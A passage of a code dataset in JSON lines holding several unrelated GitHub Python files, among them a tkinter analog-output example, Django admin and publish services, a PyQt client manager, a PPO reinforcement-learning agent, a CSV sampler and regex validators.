self.ao_props.supports_scan)\n\n if example_supported:\n main_frame = tk.Frame(self)\n main_frame.pack(fill=tk.X, anchor=tk.NW)\n\n if self.ao_props.num_chans > 1:\n channel_vcmd = self.register(self.validate_channel_entry)\n\n curr_row = 0\n low_channel_entry_label = tk.Label(main_frame)\n low_channel_entry_label[\"text\"] = \"Low Channel Number:\"\n low_channel_entry_label.grid(\n row=curr_row, column=0, sticky=tk.W)\n\n self.low_channel_entry = tk.Spinbox(\n main_frame, from_=0,\n to=max(self.ao_props.num_chans - 1, 0),\n validate='key', validatecommand=(channel_vcmd, '%P'))\n self.low_channel_entry.grid(\n row=curr_row, column=1, sticky=tk.W)\n\n curr_row += 1\n high_channel_entry_label = tk.Label(main_frame)\n high_channel_entry_label[\"text\"] = \"High Channel Number:\"\n high_channel_entry_label.grid(\n row=curr_row, column=0, sticky=tk.W)\n\n self.high_channel_entry = tk.Spinbox(\n main_frame, from_=0,\n to=max(self.ao_props.num_chans - 1, 0),\n validate='key', validatecommand=(channel_vcmd, '%P'))\n self.high_channel_entry.grid(\n row=curr_row, column=1, sticky=tk.W)\n initial_value = min(self.ao_props.num_chans - 1, 3)\n self.high_channel_entry.delete(0, tk.END)\n self.high_channel_entry.insert(0, str(initial_value))\n\n scan_info_group = tk.LabelFrame(\n self, text=\"Scan Information\", padx=3, pady=3)\n scan_info_group.pack(fill=tk.X, anchor=tk.NW, padx=3, pady=3)\n\n scan_info_group.grid_columnconfigure(1, weight=1)\n\n curr_row += 1\n status_left_label = tk.Label(scan_info_group)\n status_left_label[\"text\"] = \"Status:\"\n status_left_label.grid(row=curr_row, column=0, sticky=tk.W)\n\n self.status_label = tk.Label(scan_info_group)\n self.status_label[\"text\"] = \"Idle\"\n self.status_label.grid(row=curr_row, column=1, sticky=tk.W)\n\n curr_row += 1\n index_left_label = tk.Label(scan_info_group)\n index_left_label[\"text\"] = \"Index:\"\n index_left_label.grid(row=curr_row, column=0, sticky=tk.W)\n\n self.index_label = tk.Label(scan_info_group)\n self.index_label[\"text\"] = \"-1\"\n self.index_label.grid(row=curr_row, column=1, sticky=tk.W)\n\n curr_row += 1\n count_left_label = tk.Label(scan_info_group)\n count_left_label[\"text\"] = \"Count:\"\n count_left_label.grid(row=curr_row, column=0, sticky=tk.W)\n\n self.count_label = tk.Label(scan_info_group)\n self.count_label[\"text\"] = \"0\"\n self.count_label.grid(row=curr_row, column=1, sticky=tk.W)\n\n curr_row += 1\n self.freq_inner_frame = tk.Frame(scan_info_group)\n self.freq_inner_frame.grid(\n row=curr_row, column=0, columnspan=2, sticky=tk.W)\n\n self.freq_frame = tk.Frame(self.freq_inner_frame)\n self.freq_frame.grid()\n\n button_frame = tk.Frame(self)\n button_frame.pack(fill=tk.X, side=tk.RIGHT, anchor=tk.SE)\n\n self.start_button = tk.Button(button_frame)\n self.start_button[\"text\"] = \"Start\"\n self.start_button[\"command\"] = self.start\n self.start_button.grid(row=0, column=0, padx=3, pady=3)\n\n quit_button = tk.Button(button_frame)\n quit_button[\"text\"] = \"Quit\"\n quit_button[\"command\"] = self.exit\n quit_button.grid(row=0, column=1, padx=3, pady=3)\n\n\nif __name__ == \"__main__\":\n # Start the example\n ULAO04(master=tk.Tk()).mainloop()\n","repo_name":"GMUSatCom/GMU-Thermal-Vac","sub_path":"examples/ui/ULAO04.py","file_name":"ULAO04.py","file_ext":"py","file_size_in_byte":11094,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"17663169814","text":"import zipfile\n\nfrom django.contrib import admin\nfrom django.core import 
serializers\nfrom django.http import HttpResponse\nimport io\nfrom auth_and_perms import models\n\n@admin.action(description='Export Laboratory')\ndef export_rol_perms(admin, request, queryset):\n buffer = io.BytesIO()\n zip_file = zipfile.ZipFile(buffer, 'w')\n\n\n for rol in queryset:\n rols=models.ProfilePermission.objects.filter(rol=rol)\n zip_file.writestr(rol.name+\".json\", serializers.serialize('json', rols))\n zip_file.close()\n buffer.seek(0)\n response = HttpResponse(buffer.getvalue(),\n content_type='application/x-zip-compressed',\n headers={'Content-Disposition': 'attachment; filename=\"permissionsrol.zip\"'})\n return response\n\n\nclass RolAdmin(admin.ModelAdmin):\n filter_horizontal = ['permissions']\n actions = [export_rol_perms]\n\n\nclass AuthorizedApplicationAdmin(admin.ModelAdmin):\n list_display = ['name', 'auth_token']\n\n @admin.display(empty_value='unknown')\n def auth_token(self, obj):\n if obj.user:\n return obj.user.auth_token.key\n return 'unknown'\n\n\nadmin.site.register(models.AuthorizedApplication, AuthorizedApplicationAdmin)\nadmin.site.register(models.Profile)\nadmin.site.register(models.Rol, RolAdmin)\nadmin.site.register(models.ProfilePermission)","repo_name":"Solvosoft/organilab","sub_path":"src/auth_and_perms/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"31155615417","text":"from biicode.server.model.block import Block\nfrom biicode.common.exception import (ForbiddenException, PublishException, NotFoundException,\n ServerInternalErrorException, NotInStoreException,\n BiiRequestErrorException, BiiServiceException,\n AlreadyInStoreException)\nfrom biicode.server.exception import DuplicateBlockException\nfrom biicode.common.utils.bii_logging import logger\nimport traceback\nfrom biicode.server.authorize import Security\nfrom biicode.common.model.block_info import BlockInfo\nfrom biicode.common.model.symbolic.block_version import BlockVersion\nfrom biicode.common.model.version_tag import DEV\n\n\nclass PublishService(object):\n ''' Service for publish blocks in server.'''\n def __init__(self, store, auth_user):\n self._store = store\n self.auth_user = auth_user\n self.security = Security(self.auth_user, self._store)\n\n def publish(self, publish_request):\n '''Performs a publication\n TIP: If we add publish_request to transaction_definition we can easily have asynchronous\n publications\n\n private: Only for first publication\n '''\n from biicode.server.background.enqueuer import register_publish\n\n if publish_request.tag == DEV:\n if not publish_request:\n raise BiiRequestErrorException('Up to date, nothing to publish')\n if publish_request.versiontag is not None:\n raise PublishException('A DEV version cannot have tag %s' % publish_request.tag)\n\n assert publish_request.deptable is not None\n\n # by default it is public\n # TODO: BLock creation is not handled in the transaction\n target_version = publish_request.parent\n user = self._store.read_user(target_version.block.owner)\n # Look if user has the block already created, because the block\n # can exist with -1 version if it has been created in web\n if target_version.block not in user.blocks.keys():\n try:\n if target_version != publish_request.parent: # Branching\n user = self.create_block(target_version.block,\n publish_request.parent, private=False)\n else:\n user = self.create_block(target_version.block, private=False)\n except DuplicateBlockException:\n 
pass # Its ok, already created\n\n target_block = target_version.block\n self._store.requestBlockTransaction(target_block)\n try:\n # If we can't read the block, we can't know about his existence\n self.security.check_read_block(target_block)\n self.security.check_publish_block(target_block, publish_request)\n # biiresponse.debug('Read block \"%s\"' % brl_block)\n block = self._store.read_block(target_block)\n (cells, contents,\n old_cells_ids, old_content_ids) = self._in_memory_block_update(block, publish_request)\n except ForbiddenException:\n self._store.finishBlockTransaction(target_block)\n raise\n except PublishException as e:\n self._store.finishBlockTransaction(target_block)\n raise ServerInternalErrorException(e.message)\n except Exception as excp:\n logger.error(\"Exception in publish service!!: %s \" % str(excp))\n tb = traceback.format_exc()\n logger.error(tb)\n self._store.finishBlockTransaction(target_block)\n raise ServerInternalErrorException()\n\n self._store.beginBlockTransaction(target_block, cells, contents)\n try:\n self._write_resources_to_db(cells, contents, old_cells_ids, old_content_ids)\n self._store.update_block(block)\n self._store.commitBlockTransaction(target_block)\n register_publish(self.auth_user, block.last_version())\n self._store.finishBlockTransaction(target_block)\n\n # Need to read user again, otherwise will raise MongoNotCurrentObjectException\n # because of double update of same memory object\n user = self._store.read_user(target_version.block.owner)\n user.add_block_size_bytes(target_version.block, publish_request.bytes)\n # Save user (with block bytes updated)\n self._store.update_user(user)\n\n return block.last_version()\n\n except Exception as excp:\n tb = traceback.format_exc()\n logger.debug(tb)\n self._rollback_transaction(excp, target_block)\n raise ServerInternalErrorException('Publish transaction failed. 
Please, retry')\n\n def create_block(self, brl, private=False):\n '''Creates a block in server due the brl and description'''\n self.security.check_create_block(brl.owner, private)\n user = self._store.read_user(brl.owner)\n try:\n block_id = user.add_block(brl) # should fail if existing\n except DuplicateBlockException:\n logger.debug('Block %s already existing, not creating it' % brl)\n raise\n\n block = Block(block_id, brl)\n try: # FIXME: better upsert?\n self._store.create_block(block, private) # should fail if existing\n except AlreadyInStoreException:\n pass\n self._store.update_user(user) # raise exception if not current\n\n return user\n\n def _rollback_transaction(self, excp, brl_block):\n '''rollback transaction for publish'''\n logger.warning(str(excp) + '\\nRolling back publish transaction')\n self._store.rollBackBlockTransaction(brl_block)\n self._store.finishBlockTransaction(brl_block)\n\n def _write_resources_to_db(self, cells, contents, old_cells_ids, old_content_ids):\n '''Write cells and contents to db'''\n if old_cells_ids:\n self._store.delete_published_cells(old_cells_ids)\n if old_content_ids:\n self._store.delete_published_contents(old_content_ids)\n if cells:\n self._store.create_published_cells(cells)\n if contents:\n self._store.create_published_contents(contents)\n\n # @mongo_update_if_current_safe_retry\n # def __update_user_if_current(self, user):\n def _set_cell_roots(self, block, publish_request):\n '''Set cell root'''\n # Ensure here root assignment\n old_ids = {}\n deltas = block.deltas\n last_time = len(deltas) - 2\n\n for res in publish_request.cells:\n old_name = publish_request.renames.get_old_name(res.name.cell_name)\n old_id = block.cells.get_id(old_name, last_time)\n if old_id:\n old_ids[old_id] = res\n else:\n res.root = res.ID\n old_cells = self._store.read_published_cells(old_ids.keys())\n for old_id, old_cell in old_cells.iteritems():\n res = old_ids[old_id]\n res.root = old_cell.root\n\n def _in_memory_block_update(self, block, publish_request):\n '''Updates block in memory'''\n self.security.check_write_block(block.ID)\n cells, contents, old_cells_ids, old_content_ids = block.add_publication(publish_request,\n self.auth_user)\n self._set_cell_roots(block, publish_request)\n return cells, contents, old_cells_ids, old_content_ids\n\n def get_block_info(self, brl_block):\n '''Check if auth_user can publish a block version specified by parameter block_version\n Returns:\n BlockInfo\n '''\n\n try:\n self.security.check_read_block(brl_block)\n except NotInStoreException:\n # In this case, the block doesnt exist, but return information of -1 and permissions\n return self._get_new_block_info(brl_block)\n\n block_info = BlockInfo()\n try:\n self.security.check_write_block(brl_block)\n block_info.can_write = True\n except ForbiddenException:\n block_info.can_write = False\n\n try:\n block = self._store.read_block(brl_block)\n block_info.last_version = block.last_version()\n block_info.private = self.security.is_private(brl_block)\n except Exception as e:\n tb = traceback.format_exc()\n logger.debug(tb)\n logger.error(\"Something went wrong with %s\" % e)\n raise BiiServiceException('Something went wrong')\n\n return block_info\n\n def _get_new_block_info(self, brl_block):\n '''\n Returns BlockInfo that new block would have if we publish it.\n Raises exception if block cannot be created for any reason\n '''\n last_version = BlockVersion(brl_block, -1)\n can_write = False\n try:\n self.security.check_create_block(brl_block.owner)\n can_write = True\n 
except ForbiddenException:\n can_write = False\n except NotInStoreException:\n raise NotFoundException(\"Block %s not found!\" % brl_block.to_pretty())\n\n return BlockInfo(can_write=can_write, last_version=last_version)\n","repo_name":"biicode/bii-server","sub_path":"publish/publish_service.py","file_name":"publish_service.py","file_ext":"py","file_size_in_byte":9257,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"19"} +{"seq_id":"16942244441","text":"name = input('Type your name:')\nprint('Welcome',name,'to this adventure!')\n\nanswer = input ('You are on dirt road, it has come to an end and you can go left or right. Which way would you like to go?').lower()#Makes all the letters small for the program.\n\nif answer == 'left':\n answer = input(\"You come to a river, you can walk around it or swim across, walk or swim?\")\n\n if answer == \"swim\":\n print(\"You swam across and were eaten by an alligator.\")\n\n elif answer == \"walk\":\n print(\"You walked for many miles, ran out of water and lost the game\")\n \n\n else:\n print(\"Not a valid option. You lose.\")\n\n \n \nelif answer == \"right\":\n print (\"Not a valid option. You lose.\")\n","repo_name":"Baller321/Small-python-projects","sub_path":"choose_your_own_adventure.py","file_name":"choose_your_own_adventure.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28616212212","text":"# coding: latin-1\r\n__author__ = 'waldo'\r\nfrom gui import MdiWidget, CRUDWidget\r\nfrom ventanas import Ui_vtnCliente\r\nfrom validarDatos import ValidarDatos\r\nfrom baseDatos import Cliente as ClienteModel\r\nfrom baseDatos import Remito as RemitoModel\r\nfrom PyQt4 import QtGui\r\nclass Cliente(CRUDWidget, Ui_vtnCliente):\r\n \"\"\"\r\n Lógica del ABM de clientes.\r\n \"\"\"\r\n def __init__(self, mdi):\r\n \"\"\"\r\n Constructor de la clase Cliente.\r\n :param mdi:\r\n :return:\r\n \"\"\"\r\n MdiWidget.__init__(self, mdi)\r\n self.sesion = self.mdi().window().getSesionBD()\r\n self.validadores(ClienteModel)\r\n\r\n def cargarClientes(self):\r\n \"\"\"\r\n Carga los datos de los clientes en las tablas de las ventanas (Baja y Modificación).\r\n :return:\r\n \"\"\"\r\n self.cargarObjetos(self.tableClientes,\r\n ClienteModel.buscarTodos(\"dni\", self.sesion).all(),\r\n (\"dni\", \"nombre\", \"apellido\", \"direccion\", \"telefono\")\r\n )\r\n\r\n def crear(self):\r\n \"\"\"\r\n Da de alta un cliente nuevo y lo almacena en la base de datos.\r\n :return:\r\n \"\"\"\r\n if ValidarDatos.validarCamposVacios(self.camposRequeridos):\r\n cliente = ClienteModel(str(self.lineDni.text()), str(self.lineNombre.text()),\r\n str(self.lineApellido.text()), str(self.lineDireccion.text()),\r\n str(self.lineTelefono.text()))\r\n if cliente.guardar(self.sesion):\r\n self.showMsjEstado(\"El Cliente fue dado de alta.\")\r\n self.limpiarCampos()\r\n self.objectCreated.emit()\r\n else:\r\n cliente = ClienteModel.buscar(ClienteModel.dni, self.sesion,\r\n str(self.lineDni.text())).first()\r\n if cliente.getBaja():\r\n cliente.setBaja(False)\r\n cliente.modificar(self.sesion)\r\n self.showMsjEstado(\"El Cliente fue dado de alta.\")\r\n self.limpiarCampos()\r\n self.objectCreated.emit()\r\n else:\r\n QtGui.QMessageBox.critical(self, 'Error', 'El Cliente ya existe.', 'Aceptar')\r\n else:\r\n self.showMsjEstado(\"Hay datos obligatorios que no fueron completados.\")\r\n\r\n def eliminar(self):\r\n \"\"\"\r\n Da de baja el cliente 
selecionado.\r\n :return:\r\n \"\"\"\r\n itemActual=self.tableClientes.currentItem()\r\n if itemActual==None:\r\n self.showMsjEstado(\"No se ha seleccionado ningun Cliente de la tabla\")\r\n else:\r\n row = itemActual.row()\r\n dni = str(self.tableClientes.item(row, 0).text())\r\n if self.bajaValida(dni):\r\n query = ClienteModel.buscarAlta(ClienteModel.dni, self.sesion, dni)\r\n for instance in query.all():\r\n self.cliente = instance\r\n self.cliente.borrar(self.sesion)\r\n self.showMsjEstado(\"El Cliente ha sido dado de baja\")\r\n self.tableClientes.removeRow(row)\r\n self.objectDeleted.emit()\r\n self.actualizar()\r\n else:\r\n QtGui.QMessageBox.critical(self, 'Error', 'Existen remitos pendientes de pago para dicho '\r\n 'Cliente.', 'Aceptar')\r\n\r\n def modificar(self):\r\n \"\"\"\r\n Modifica los datos del cliente seleccionado.\r\n :return:\r\n \"\"\"\r\n itemActual=self.tableClientes.currentItem()\r\n if itemActual!=None:\r\n if ValidarDatos.validarCamposVacios(self.camposRequeridos):\r\n row = itemActual.row()\r\n dni = str(self.tableClientes.item(row, 0).text())\r\n query = ClienteModel.buscarAlta(ClienteModel.dni, self.sesion, dni)\r\n for instance in query.all():\r\n self.cliente = instance\r\n self.cliente.setNombre(str(self.lineNombre.text()))\r\n self.cliente.setApellido(str(self.lineApellido.text()))\r\n self.cliente.setDireccion(str(self.lineDireccion.text()))\r\n self.cliente.setTelefono(str(self.lineTelefono.text()))\r\n self.cliente.modificar(self.sesion)\r\n self.showMsjEstado(\"El cliente fue modificado\")\r\n self.objectModified.emit()\r\n self.actualizar()\r\n else:\r\n self.showMsjEstado(\"Hay datos obligatorios que no fueron completados.\")\r\n else:\r\n self.showMsjEstado(\"No se ha seleccionado un Cliente de la tabla\")\r\n\r\n def bajaValida(self, dni):\r\n \"\"\"\r\n Verifica que el cliente no posea remitos sin pagar.\r\n :param dni: DNI del cliente para el cual se realiza la verificación.\r\n :return: bool\r\n \"\"\"\r\n remito = RemitoModel.buscarAlta(RemitoModel.cliente, self.sesion, dni).all()\r\n for r in remito:\r\n if r.getCobrado() == None:\r\n return False\r\n return True\r\n\r\n def cargarCamposBaja(self):\r\n \"\"\"\r\n Carga los campos con los datos del cliente seleccionado (Baja).\r\n :return:\r\n \"\"\"\r\n self.lineNombre.setEnabled(False)\r\n self.lineApellido.setEnabled(False)\r\n self.cargarCamposMod()\r\n\r\n def buscar(self):\r\n \"\"\"\r\n Busca al cliente de acuerdo a la información ingresada y carga los datos en la tabla (Baja y Modificaión).\r\n :return:\r\n \"\"\"\r\n obj = self.sender().objectName()\r\n if obj == 'lineDni':\r\n clientes = ClienteModel.buscarAlta(ClienteModel.dni, self.sesion, str(self.lineDni.text())).all()\r\n elif obj == 'lineNombre':\r\n clientes = ClienteModel.buscarLike(ClienteModel.nombre, self.sesion,\r\n str(self.lineNombre.text())).all()\r\n elif obj == 'lineApellido':\r\n clientes = ClienteModel.buscarLike(ClienteModel.apellido, self.sesion,\r\n str(self.lineApellido.text())).all()\r\n elif obj == 'btnBuscar':\r\n if str(self.lineDni.text()) != \"\":\r\n clientes = ClienteModel.buscarAlta(ClienteModel.dni, self.sesion, str(self.lineDni.text())).all()\r\n elif str(self.lineNombre.text()) != \"\":\r\n clientes = ClienteModel.buscarLike(ClienteModel.nombre, self.sesion,\r\n str(self.lineNombre.text())).all()\r\n elif str(self.lineApellido.text()) != \"\":\r\n clientes = ClienteModel.buscarLike(ClienteModel.apellido, self.sesion,\r\n str(self.lineApellido.text())).all()\r\n else:\r\n 
self.showMsjEstado(\"Ingrese DNI, Nombre o Apellido del Cliente para realizar la\"\r\n \" busqueda.\")\r\n return\r\n self.limpiarTabla(self.tableClientes)\r\n self.cargarObjetos(self.tableClientes, clientes,\r\n (\"dni\", \"nombre\", \"apellido\", \"direccion\", \"telefono\")\r\n )\r\n\r\n def actualizar(self):\r\n \"\"\"\r\n Actualiza los componentes de las ventanas.\r\n :return:\r\n \"\"\"\r\n self.limpiarCampos()\r\n self.limpiarTabla(self.tableClientes)\r\n self.cargarClientes()\r\n\r\n def limpiarCampos(self):\r\n \"\"\"\r\n Vacia los campos de la ventana.\r\n :return:\r\n \"\"\"\r\n self.lineDni.clear()\r\n self.lineDni.setEnabled(True)\r\n self.lineNombre.clear()\r\n self.lineNombre.setEnabled(True)\r\n self.lineApellido.clear()\r\n self.lineApellido.setEnabled(True)\r\n self.lineDireccion.clear()\r\n self.lineTelefono.clear()\r\n self.tableClientes.setCurrentItem(None)\r\n\r\n def cargarCamposMod(self):\r\n \"\"\"\r\n Carga los campos con los datos del cliente seleccionado (Modificación).\r\n :return:\r\n \"\"\"\r\n self.lineDni.setEnabled(False)\r\n row=self.tableClientes.currentItem().row()\r\n infoItem=[]\r\n for col in range(0,self.tableClientes.columnCount()):\r\n infoItem.append(self.tableClientes.item(row,col).text())\r\n #Cargar la info del item en los lines\r\n self.lineDni.setText(infoItem[0])\r\n self.lineNombre.setText(infoItem[1])\r\n self.lineApellido.setText(infoItem[2])\r\n self.lineDireccion.setText(infoItem[3])\r\n self.lineTelefono.setText(infoItem[4])\r\n\r\n @classmethod\r\n def create(cls, mdi):\r\n \"\"\"\r\n Configuración de la ventana Alta Cliente.\r\n :param mdi: referencia a la ventana Alta Cliente.\r\n :return: gui\r\n \"\"\"\r\n gui = super(Cliente, cls).create(mdi)\r\n gui.groupBuscar.hide()\r\n gui.btnBuscar.hide()\r\n gui.btnAceptar.pressed.connect(gui.crear)\r\n gui.btnCancelar.pressed.connect(gui.limpiarCampos)\r\n return gui\r\n\r\n @classmethod\r\n def delete(cls, mdi):\r\n \"\"\"\r\n Configuración de la ventana Baja Cliente.\r\n :param mdi: referencia a la ventana Baja Cliente.\r\n :return: gui\r\n \"\"\"\r\n gui = super(Cliente, cls).delete(mdi)\r\n gui.lineDireccion.setEnabled(False)\r\n gui.lineTelefono.setEnabled(False)\r\n gui.lineDni.returnPressed.connect(gui.buscar)\r\n gui.lineNombre.returnPressed.connect(gui.buscar)\r\n gui.lineApellido.returnPressed.connect(gui.buscar)\r\n gui.cargarClientes()\r\n gui.btnAceptar.pressed.connect(gui.eliminar)\r\n gui.btnCancelar.pressed.connect(gui.actualizar)\r\n gui.btnBuscar.pressed.connect(gui.buscar)\r\n gui.tableClientes.itemClicked.connect(gui.cargarCamposBaja)\r\n return gui\r\n\r\n @classmethod\r\n def update(cls, mdi):\r\n \"\"\"\r\n Configuración de la ventana Modificación Cliente.\r\n :param mdi: referencia a la ventana Modificación Cliente.\r\n :return: gui\r\n \"\"\"\r\n gui = super(Cliente, cls).update(mdi)\r\n gui.cargarClientes()\r\n gui.tableClientes.itemClicked.connect(gui.cargarCamposMod)\r\n gui.lineDni.returnPressed.connect(gui.buscar)\r\n gui.lineNombre.returnPressed.connect(gui.buscar)\r\n gui.lineApellido.returnPressed.connect(gui.buscar)\r\n gui.btnAceptar.pressed.connect(gui.modificar)\r\n gui.btnCancelar.pressed.connect(gui.actualizar)\r\n gui.btnBuscar.pressed.connect(gui.buscar)\r\n return gui\r\n\r\n","repo_name":"UNPSJB/FarmaciaCrisol","sub_path":"gestionClientes/lgClientes.py","file_name":"lgClientes.py","file_ext":"py","file_size_in_byte":10526,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} 
+{"seq_id":"5164916032","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.distributions import Normal\nfrom Network import Actor, Critic\n\nclass PPO:\n def __init__(self,\n s_dim=3,\n a_dim=1,\n bound=2,\n actor_lr=1e-4,\n critic_lr=2e-4,\n update_step_a=10,\n update_step_c=10,\n gamma=0.9,\n epsilon=0.2):\n # Parameter initialization\n self.s_dim = s_dim\n self.a_dim = a_dim\n self.bound = bound\n self.actor_lr = actor_lr\n self.critic_lr = critic_lr\n self.update_step_a = update_step_a\n self.update_step_c = update_step_c\n self.gamma = gamma\n self.epsilon = epsilon\n\n # network initialization\n self.actor = Actor(s_dim, a_dim, bound)\n self.actor_old = Actor(s_dim, a_dim, bound)\n self.actor_old.load_state_dict(self.actor.state_dict())\n self.actor_opt = torch.optim.Adam(self.actor.parameters(), lr=self.actor_lr)\n self.critic = Critic(s_dim)\n self.critic_opt = torch.optim.Adam(self.critic.parameters(), lr=self.critic_lr)\n\n # memory initialization\n self.memory_s, self.memory_a, self.memory_r = [], [], []\n\n def get_action(self, s):\n # select action w.r.t the actions prob\n s = torch.FloatTensor(s)\n mu, sigma = self.actor(s)\n dist = Normal(loc=mu, scale=sigma)\n a = dist.sample()\n a = torch.clamp(a, -self.bound, self.bound)\n return a.item()\n\n def get_v(self, s):\n # the state value\n s = torch.FloatTensor(s)\n with torch.no_grad():\n v = self.critic(s)\n return v.item()\n\n def calculate_log_prob(self, s, a, old=False):\n # s.shape = [batch, s_dim], a.shape = [batch, a_dim]\n # mu.shape = sigma.shape = log_prob.shape = [batch, a_dim]\n if old:\n with torch.no_grad():\n mu, sigma = self.actor_old(s)\n else:\n mu, sigma = self.actor(s)\n dist = Normal(loc=mu, scale=sigma)\n log_prob = dist.log_prob(a)\n return log_prob\n\n def learn(self, s, a, s_, r, done):\n # store transition\n self.memory_s.append(s)\n self.memory_a.append(a)\n self.memory_r.append(r)\n if done:\n # calculate the discounted reward\n discounted_r = []\n v_ = self.get_v(s_)\n for t in range(len(self.memory_r) - 1, -1, -1):\n v_ = self.memory_r[t] + self.gamma * v_\n discounted_r.insert(0, v_)\n s = torch.FloatTensor(self.memory_s)\n a = torch.FloatTensor(self.memory_a).unsqueeze(dim=-1)\n r = torch.FloatTensor(discounted_r).unsqueeze(dim=-1)\n # start to update network\n self.actor_old.load_state_dict(self.actor.state_dict())\n old_log_prob = self.calculate_log_prob(s, a, old=True)\n with torch.no_grad():\n advantage = r - self.critic(s)\n for _ in range(self.update_step_a):\n self.update_actor(s, a, advantage, old_log_prob)\n for _ in range(self.update_step_c):\n self.update_critic(s, r)\n # empty the memory\n self.memory_s, self.memory_a, self.memory_r = [], [], []\n\n def update_actor(self, s, a, advantage, old_log_prob):\n # calculate the loss\n log_prob = self.calculate_log_prob(s, a)\n ratio = torch.exp(log_prob - old_log_prob)\n surr1 = ratio*advantage\n surr2 = torch.clamp(ratio, 1.0 - self.epsilon,\n 1.0 + self.epsilon) * advantage\n loss = -torch.mean(torch.min(surr1, surr2))\n # update\n self.actor_opt.zero_grad()\n loss.backward()\n self.actor_opt.step()\n\n def update_critic(self, s, r):\n # calculate critic loss\n v = self.critic(s)\n advantage = r - v\n loss = torch.mean(advantage**2)\n # update\n self.critic_opt.zero_grad()\n loss.backward()\n self.critic_opt.step()","repo_name":"Parisfal/DRL-Pytorch-Tutorial","sub_path":"4.1 
PPO1/Agent.py","file_name":"Agent.py","file_ext":"py","file_size_in_byte":4125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"70486599404","text":"import os \nimport csv \nimport time\nimport pandas as pd \nimport numpy as np \n\"\"\"\ndesc1: data cleaning script\ndesc: deduplicate the data and pick representative pio_type values; the raw data was pulled straight from the database, so records of the same type appear far too often.\n    This script cleans the data and selects a subset of it to use as a training set or test set.\ndemand: the data is a csv file, ideally already deduplicated inside the csv\n\"\"\"\ndef load_data():\n    # Set the path of the file to read and the path of the file to write\n    file_path = \"\"\n    result_path = \"\"\n    if os.path.exists(file_path) and os.path.exists(result_path):\n        print(\"file exist, the process can continue\")\n    else:\n        print(\"file not exist\")\n        return\n    raw_file = pd.read_csv(file_path, engine=\"python\")\n    result_file = open(result_path, mode='a', newline='')\n\n    # Interactive command-line prompt, to make it easy to set the sampling parameter sampel_num\n    m, n = raw_file.shape\n    result_writer = csv.writer(result_file)\n    sampel_num = input(\"how many data do you want extract from the origin file :\")\n    if sampel_num == None:\n        print(\"we set a default number for you, number is 10000\")\n        sampel_num = 10000\n    sampel_num = int(sampel_num)\n    if sampel_num >= m:\n        print(\"invalid number\")\n    keyIn = input(\"make sure you have define how many data do you want, continue(yes/no?)\")\n    if keyIn != \"yes\":\n        return\n    print(\"the process start working\")\n    \n    # Core logic: extract the data\n    begin_time = time.perf_counter()\n    print(0, raw_file.loc[0][1])\n    print(1, raw_file.loc[1][1])\n    for i in range(m):\n        # k = raw_file.loc[i][1]\n        # print(k, type(k))\n        # Note: raw_file.loc[i][1] is of type str; only the first character of the string is compared to decide whether to select this sample\n        if i >= sampel_num:\n            break\n        if i == 0 or raw_file.loc[i][1][0] != raw_file.loc[i-1][1][0]:\n            # print(raw_file.loc[i][1])\n            kk = raw_file.loc[i][1]\n            print(kk)\n            result_writer.writerow([kk])\n    print(\"data storing...\")\n    result_file.close()\n    end_time = time.perf_counter()\n    print(\"time consuming of the process:\", end_time-begin_time, \"s\")\n\ndef main():\n    load_data()\n\nif __name__ == \"__main__\":\n    main()","repo_name":"dddfgkl/csvAndExcel","sub_path":"csvAnalyse/extract_data.py","file_name":"extract_data.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"39581575050","text":"# Regex without using Google Search (Hors Arev :D)\nimport re\npattern = '^([0-9a-zA-Z_\\.-]+)\\@([0-9a-zA-Z_\\.-]+)\\.(ru|com|io|net|ai)$'\nstring = 'example@mail.ru'\npattern2 = '^([0-9a-fA-F]{4})\\:([0-9a-fA-F]{4})\\:([0-9a-fA-F]{4})\\:([0-9a-fA-F]{4})$'\nstring2 = '2001:0DB8:AC10:FE01'\nresult = re.findall(pattern, string)\nresult2 = re.findall(pattern2, string2)\nif len(result) > 0:\n\tif len(result[0]) == 3:\n\t\tprint('Valid E-mail :)')\n\telse:\n\t\tprint('No Valid E-mail :)')\nelse:\n\tprint('No Valid E-mail :)')\nif len(result2) > 0:\n\tif len(result2[0]) == 4:\n\t\tprint('Valid IPV6 :)')\n\telse:\n\t\tprint('No Valid IPV6 :)')\nelse:\n\tprint('No Valid IPV6 :)')","repo_name":"wizardcapone/Basic-IT-Center-Python","sub_path":"Regex/regex.py","file_name":"regex.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"45587018713","text":"from typing import Optional\nfrom core.db import Transactional\nfrom sqlalchemy import select, and_\n\nfrom core.db import session\nfrom core.utils import LanguageManager\nfrom ..models import ProductTax\nclass ProductTaxService:\n    def __init__(self):\n        ...\n\n    @Transactional()\n    async def create_product_tax(\n        self,\n        
product_id: int,\n        tax_id: int,\n        tax: float,\n        tax_type: str,\n    ) -> str:\n        pass\n    \n    async def delete(\n        self,\n        ids: list,\n        flag: str,\n        accept_language: Optional[str],\n        language_manager: LanguageManager,\n    ) -> dict:\n        print (\"~~~~~~~~~~~~~~~~~~~~~~~ product taxes delete request\")\n        result = await session.execute(\n            select(ProductTax).where(ProductTax.product_id.in_(ids))\n        )\n        product_taxes = result.scalars().all()\n        if not product_taxes:\n            print (\"Product taxes not found\")\n        else:\n            for product_tax in product_taxes:\n                await session.delete(product_tax)\n            if flag!=\"direct\":\n                await session.commit()\n            print (\"product taxes delete success\")\n        return { \"success\": True, \"message\": language_manager.get_message(accept_language=accept_language, key=\"product_taxes_deleted\") }","repo_name":"techguru0/easyric-api-beta","sub_path":"app/product_tax/services/product_tax.py","file_name":"product_tax.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} 